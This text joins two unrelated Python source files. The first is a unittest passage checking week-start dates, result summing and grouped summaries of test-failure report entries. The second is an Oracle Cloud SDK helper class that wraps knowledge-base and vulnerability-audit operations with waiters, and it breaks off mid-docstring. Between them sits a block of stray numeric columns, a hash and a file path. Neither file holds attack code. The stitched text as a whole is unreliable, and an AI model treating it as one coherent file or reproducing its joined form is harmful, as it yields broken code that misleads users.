self.assertEqual(datetime.date(2017, 6, 4), entry.week_start_date("sunday"))
entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 5))
self.assertEqual(datetime.date(2017, 6, 4), entry.week_start_date("sunday"))
def test_week_start_date_with_monday(self):
"""
Tests for test_failures.ReportEntry.week_start_date() with the beginning of the week
specified as different forms of the string "Monday".
"""
entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 3))
self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date("monday"))
self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date("Monday"))
self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date("MONDAY"))
entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 4))
self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date("monday"))
entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 5))
self.assertEqual(datetime.date(2017, 6, 5), entry.week_start_date("monday"))
entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 6))
self.assertEqual(datetime.date(2017, 6, 5), entry.week_start_date("monday"))
def test_week_start_date_with_date(self):
"""
Tests for test_failures.ReportEntry.week_start_date() with the beginning of the week
specified as a datetime.date() value.
"""
entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 3))
date = datetime.date(2017, 5, 21)
self.assertEqual(6, date.weekday(), "2017 May 21 is a Sunday")
self.assertEqual(datetime.date(2017, 5, 28), entry.week_start_date(date))
date = datetime.date(2017, 5, 22)
self.assertEqual(0, date.weekday(), "2017 May 22 is a Monday")
self.assertEqual(datetime.date(2017, 5, 29), entry.week_start_date(date))
date = datetime.date(2017, 6, 6)
self.assertEqual(1, date.weekday(), "2017 Jun 06 is a Tuesday")
self.assertEqual(datetime.date(2017, 5, 30), entry.week_start_date(date))
date = datetime.date(2017, 6, 9)
self.assertEqual(4, date.weekday(), "2017 Jun 09 is a Friday")
self.assertEqual(datetime.date(2017, 6, 2), entry.week_start_date(date))
date = datetime.date(2017, 6, 3)
self.assertEqual(5, date.weekday(), "2017 Jun 03 is a Saturday")
self.assertEqual(datetime.date(2017, 6, 3), entry.week_start_date(date))
def test_sum_combines_test_results(self):
"""
Tests for test_failures.ReportEntry.sum() that verify the start_date, end_date, num_pass,
and num_fail attributes are accumulated correctly.
"""
entry1 = self.ENTRY._replace(start_date=datetime.date(2017, 6, 1),
end_date=datetime.date(2017, 6, 1),
num_pass=1,
num_fail=0)
entry2 = self.ENTRY._replace(start_date=datetime.date(2017, 6, 2),
end_date=datetime.date(2017, 6, 2),
num_pass=0,
num_fail=3)
entry3 = self.ENTRY._replace(start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 3),
num_pass=0,
num_fail=0)
entry4 = self.ENTRY._replace(start_date=datetime.date(2017, 6, 4),
end_date=datetime.date(2017, 6, 4),
num_pass=2,
num_fail=2)
entry_1234 = test_failures.ReportEntry.sum([entry1, entry2, entry3, entry4])
entry_1432 = test_failures.ReportEntry.sum([entry1, entry4, entry3, entry2])
entry_124 = test_failures.ReportEntry.sum([entry1, entry2, entry4])
entry_13 = test_failures.ReportEntry.sum([entry1, entry3])
entry_42 = test_failures.ReportEntry.sum([entry4, entry2])
self.assertEqual(datetime.date(2017, 6, 1), entry_1234.start_date)
self.assertEqual(datetime.date(2017, 6, 4), entry_1234.end_date)
self.assertEqual(3, entry_1234.num_pass)
self.assertEqual(5, entry_1234.num_fail)
self.assertEqual(entry_1234, entry_1432, "order of arguments shouldn't matter")
self.assertEqual(entry_1234, entry_124, "entry3 didn't have any test executions")
self.assertEqual(datetime.date(2017, 6, 1), entry_13.start_date)
self.assertEqual(datetime.date(2017, 6, 3), entry_13.end_date)
self.assertEqual(1, entry_13.num_pass)
self.assertEqual(0, entry_13.num_fail)
self.assertEqual(datetime.date(2017, 6, 2), entry_42.start_date)
self.assertEqual(datetime.date(2017, 6, 4), entry_42.end_date)
self.assertEqual(2, entry_42.num_pass)
self.assertEqual(5, entry_42.num_fail)
def test_sum_combines_test_info(self):
"""
Tests for test_failures.ReportEntry.sum() that verify the test, task, variant, and distro
attributes are accumulated correctly.
"""
entry1 = self.ENTRY._replace(test="jstests/core/all.js",
task="jsCore_WT",
variant="linux-64",
distro="rhel62")
entry2 = self.ENTRY._replace(test="jstests/core/all.js",
task="jsCore_WT",
variant="linux-64",
distro="rhel55")
entry3 = self.ENTRY._replace(test="jstests/core/all2.js",
task="jsCore_WT",
variant="linux-64-debug",
distro="rhel62")
entry4 = self.ENTRY._replace(test="jstests/core/all.js",
task="jsCore",
variant="linux-64-debug",
distro="rhel62")
entry_12 = test_failures.ReportEntry.sum([entry1, entry2])
self.assertEqual("jstests/core/all.js", entry_12.test)
self.assertEqual("jsCore_WT", entry_12.task)
self.assertEqual("linux-64", entry_12.variant)
self.assertIsInstance(entry_12.distro, test_failures.Wildcard)
entry_123 = test_failures.ReportEntry.sum([entry1, entry2, entry3])
self.assertIsInstance(entry_123.test, test_failures.Wildcard)
self.assertEqual("jsCore_WT", entry_123.task)
self.assertIsInstance(entry_123.variant, test_failures.Wildcard)
self.assertIsInstance(entry_123.distro, test_failures.Wildcard)
entry_1234 = test_failures.ReportEntry.sum([entry1, entry2, entry3, entry4])
self.assertIsInstance(entry_1234.test, test_failures.Wildcard)
self.assertIsInstance(entry_1234.task, test_failures.Wildcard)
self.assertIsInstance(entry_1234.variant, test_failures.Wildcard)
self.assertIsInstance(entry_1234.distro, test_failures.Wildcard)
entry_34 = test_failures.ReportEntry.sum([entry3, entry4])
self.assertIsInstance(entry_34.test, test_failures.Wildcard)
self.assertIsInstance(entry_34.task, test_failures.Wildcard)
self.assertEqual("linux-64-debug", entry_34.variant)
self.assertEqual("rhel62", entry_34.distro)
class TestReportSummarization(unittest.TestCase):
"""
Tests for test_failures.Report.summarize_by().
"""
ENTRY = test_failures.ReportEntry(test="jstests/core/all.js",
task="jsCore_WT",
variant="linux-64",
distro="rhel62",
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 3),
num_pass=0,
num_fail=0)
ENTRIES = [
ENTRY._replace(start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 3),
num_pass=1,
num_fail=0),
ENTRY._replace(task="jsCore",
start_date=datetime.date(2017, 6, 5),
end_date=datetime.date(2017, 6, 5),
num_pass=0,
num_fail=1),
ENTRY._replace(start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0),
# The following entry is intentionally not in timestamp order to verify that the
# 'time_period' parameter becomes part of the sort in summarize_by().
ENTRY._replace(start_date=datetime.date(2017, 6, 9),
end_date=datetime.date(2017, 6, 9),
num_pass=1,
num_fail=0),
ENTRY._replace(distro="rhel55",
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=0,
num_fail=1),
ENTRY._replace(test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0),
ENTRY._replace(variant="linux-64-debug",
start_date=datetime.date(2017, 6, 17),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1),
]
def test_group_all_by_test_task_variant_distro(self):
"""
Tests that summarize_by() correctly accumulates all unique combinations of
(test, task, variant, distro).
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST_TASK_VARIANT_DISTRO)
self.assertEqual(5, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
task="jsCore",
start_date=datetime.date(2017, 6, 5),
end_date=datetime.date(2017, 6, 5),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
distro="rhel55",
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 10),
num_pass=3,
num_fail=0,
))
self.assertEqual(summed_entries[3], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 17),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[4], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0,
))
def test_group_all_by_test_task_variant(self):
"""
Tests that summarize_by() correctly accumulates all unique combinations of
(test, task, variant).
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST_TASK_VARIANT)
self.assertEqual(4, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
task="jsCore",
start_date=datetime.date(2017, 6, 5),
end_date=datetime.date(2017, 6, 5),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 10),
num_pass=3,
num_fail=1,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 17),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[3], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0,
))
def test_group_all_by_test_task(self):
"""
Tests that summarize_by() correctly accumulates all unique combinations of (test, task).
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST_TASK)
self.assertEqual(3, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
task="jsCore",
start_date=datetime.date(2017, 6, 5),
end_date=datetime.date(2017, 6, 5),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
variant=test_failures.Wildcard("variants"),
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 17),
num_pass=3,
num_fail=2,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0,
))
def test_group_all_by_test(self):
"""
Tests that summarize_by() correctly accumulates all unique combinations of (test,).
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST)
self.assertEqual(2, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
task=test_failures.Wildcard("tasks"),
variant=test_failures.Wildcard("variants"),
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 17),
num_pass=3,
num_fail=3,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0,
))
def test_group_all_by_variant_task(self):
"""
Tests that summarize_by() correctly accumulates all unique combinations of (variant, task).
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(["variant", "task"])
self.assertEqual(3, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
task="jsCore",
start_date=datetime.date(2017, 6, 5),
end_date=datetime.date(2017, 6, 5),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
test=test_failures.Wildcard("tests"),
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 10),
num_pass=4,
num_fail=1,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 17),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
def test_group_weekly_by_test_starting_on_sunday(self):
"""
Tests that summarize_by() correctly accumulates by week when the beginning of the week is
specified as the string "sunday".
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST,
time_period=test_failures.Report.WEEKLY,
start_day_of_week=test_failures.Report.SUNDAY)
self.assertEqual(4, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 3),
num_pass=1,
num_fail=0,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
task=test_failures.Wildcard("tasks"),
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 4),
end_date=datetime.date(2017, 6, 10),
num_pass=2,
num_fail=2,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 11),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[3], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 4),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0,
))
def test_group_weekly_by_test_starting_on_monday(self):
"""
Tests that summarize_by() correctly accumulates by week when the beginning of the week is
specified as the string "monday".
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST,
time_period=test_failures.Report.WEEKLY,
start_day_of_week=test_failures.Report.MONDAY)
self.assertEqual(4, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 4),
num_pass=1,
num_fail=0,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
task=test_failures.Wildcard("tasks"),
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 5),
end_date=datetime.date(2017, 6, 11),
num_pass=2,
num_fail=2,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 12),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[3], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 5),
end_date=datetime.date(2017, 6, 11),
num_pass=1,
num_fail=0,
))
def test_group_weekly_by_test_starting_on_date(self):
"""
Tests that summarize_by() correctly accumulates by week when the beginning of the week is
specified as a datetime.date() value.
"""
date = datetime.date(2017, 6, 7)
self.assertEqual(2, date.weekday(), "2017 Jun 07 is a Wednesday")
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST,
time_period=test_failures.Report.WEEKLY,
start_day_of_week=date)
self.assertEqual(4, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
task=test_failures.Wildcard("tasks"),
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 6),
num_pass=1,
num_fail=1,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 7),
end_date=datetime.date(2017, 6, 13),
num_pass=2,
num_fail=1,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 14),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[3], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 7),
end_date=datetime.date(2017, 6, 13),
num_pass=1,
num_fail=0,
))
def test_group_daily_by_test(self):
"""
Tests that summarize_by() correctly accumulates by day.
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST,
time_period=test_failures.Report.DAILY)
self.assertEqual(6, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 3),
num_pass=1,
num_fail=0,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
task="jsCore",
start_date=datetime.date(2017, 6, 5),
end_date=datetime.date(2017, 6, 5),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
start_date=datetime.date(2017, 6, 9),
end_date=datetime.date(2017, 6, 9),
num_pass=1,
num_fail=0,
))
self.assertEqual(summed_entries[3], self.ENTRY._replace(
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=1,
))
self.assertEqual(summed_entries[4], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 17),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[5], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 10),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0,
))
def test_group_4days_by_test(self):
"""
Tests that summarize_by() correctly accumulates by multiple days.
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST,
time_period=datetime.timedelta(days=4))
self.assertEqual(4, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
task=test_failures.Wildcard("tasks"),
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 6),
num_pass=1,
num_fail=1,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 7),
end_date=datetime.date(2017, 6, 10),
num_pass=2,
num_fail=1,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 15),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[3], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 7),
end_date=datetime.date(2017, 6, 10),
num_pass=1,
num_fail=0,
))
def test_group_9days_by_test(self):
"""
Tests that summarize_by() correctly accumulates by multiple days, including time periods
greater than 1 week.
"""
report = test_failures.Report(self.ENTRIES)
summed_entries = report.summarize_by(test_failures.Report.TEST,
time_period=datetime.timedelta(days=9))
self.assertEqual(3, len(summed_entries))
self.assertEqual(summed_entries[0], self.ENTRY._replace(
task=test_failures.Wildcard("tasks"),
distro=test_failures.Wildcard("distros"),
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 11),
num_pass=3,
num_fail=2,
))
self.assertEqual(summed_entries[1], self.ENTRY._replace(
variant="linux-64-debug",
start_date=datetime.date(2017, 6, 12),
end_date=datetime.date(2017, 6, 17),
num_pass=0,
num_fail=1,
))
self.assertEqual(summed_entries[2], self.ENTRY._replace(
test="jstests/core/all2.js",
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 11),
num_pass=1,
num_fail=0,
))
| 41.233383
| 99
| 0.571557
| 3,317
| 27,915
| 4.603557
| 0.051553
| 0.116306
| 0.15298
| 0.149181
| 0.88854
| 0.853766
| 0.819777
| 0.798232
| 0.768304
| 0.752325
| 0
| 0.072572
| 0.31535
| 27,915
| 676
| 100
| 41.294379
| 0.726402
| 0.076482
| 0
| 0.744275
| 0
| 0
| 0.045525
| 0
| 0
| 0
| 0
| 0
| 0.206107
| 1
| 0.032443
| false
| 0.116412
| 0.007634
| 0
| 0.049618
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0a411bc3a07228ad0c6e64ade12ee1d0c1cad812
| 17,413
|
py
|
Python
|
src/oci/adm/application_dependency_management_client_composite_operations.py
|
pabs3/oci-python-sdk
|
437ba18ce39af2d1090e277c4bb8750c89f83021
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/adm/application_dependency_management_client_composite_operations.py
|
pabs3/oci-python-sdk
|
437ba18ce39af2d1090e277c4bb8750c89f83021
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/adm/application_dependency_management_client_composite_operations.py
|
pabs3/oci-python-sdk
|
437ba18ce39af2d1090e277c4bb8750c89f83021
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class ApplicationDependencyManagementClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.adm.ApplicationDependencyManagementClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new ApplicationDependencyManagementClientCompositeOperations object
:param ApplicationDependencyManagementClient client:
The service client which will be wrapped by this object
"""
self.client = client
def change_knowledge_base_compartment_and_wait_for_state(self, knowledge_base_id, change_knowledge_base_compartment_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.change_knowledge_base_compartment` and waits for the :py:class:`~oci.adm.models.WorkRequest`
to enter the given state(s).
:param str knowledge_base_id: (required)
The Oracle Cloud Identifier (`OCID`__) of a Knowledge Base, as a URL path parameter.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.adm.models.ChangeKnowledgeBaseCompartmentDetails change_knowledge_base_compartment_details: (required)
The information to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.change_knowledge_base_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_knowledge_base_compartment(knowledge_base_id, change_knowledge_base_compartment_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_knowledge_base_and_wait_for_state(self, create_knowledge_base_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.create_knowledge_base` and waits for the :py:class:`~oci.adm.models.WorkRequest`
to enter the given state(s).
:param oci.adm.models.CreateKnowledgeBaseDetails create_knowledge_base_details: (required)
The details to create a new Knowledge Base.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.create_knowledge_base`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_knowledge_base(create_knowledge_base_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vulnerability_audit_and_wait_for_state(self, create_vulnerability_audit_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.create_vulnerability_audit` and waits for the :py:class:`~oci.adm.models.WorkRequest`
to enter the given state(s).
:param oci.adm.models.CreateVulnerabilityAuditDetails create_vulnerability_audit_details: (required)
The details to create a new Vulnerability Audit.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.create_vulnerability_audit`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vulnerability_audit(create_vulnerability_audit_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_knowledge_base_and_wait_for_state(self, knowledge_base_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.delete_knowledge_base` and waits for the :py:class:`~oci.adm.models.WorkRequest`
to enter the given state(s).
:param str knowledge_base_id: (required)
The Oracle Cloud Identifier (`OCID`__) of a Knowledge Base, as a URL path parameter.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.delete_knowledge_base`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = None
try:
operation_result = self.client.delete_knowledge_base(knowledge_base_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_vulnerability_audit_and_wait_for_state(self, vulnerability_audit_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.delete_vulnerability_audit` and waits for the :py:class:`~oci.adm.models.VulnerabilityAudit` acted upon
to enter the given state(s).
:param str vulnerability_audit_id: (required)
Unique Vulnerability Audit identifier path parameter.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.VulnerabilityAudit.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.delete_vulnerability_audit`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_vulnerability_audit(vulnerability_audit_id)
operation_result = None
try:
operation_result = self.client.delete_vulnerability_audit(vulnerability_audit_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_knowledge_base_and_wait_for_state(self, knowledge_base_id, update_knowledge_base_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.update_knowledge_base` and waits for the :py:class:`~oci.adm.models.WorkRequest`
to enter the given state(s).
:param str knowledge_base_id: (required)
The Oracle Cloud Identifier (`OCID`__) of a Knowledge Base, as a URL path parameter.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.adm.models.UpdateKnowledgeBaseDetails update_knowledge_base_details: (required)
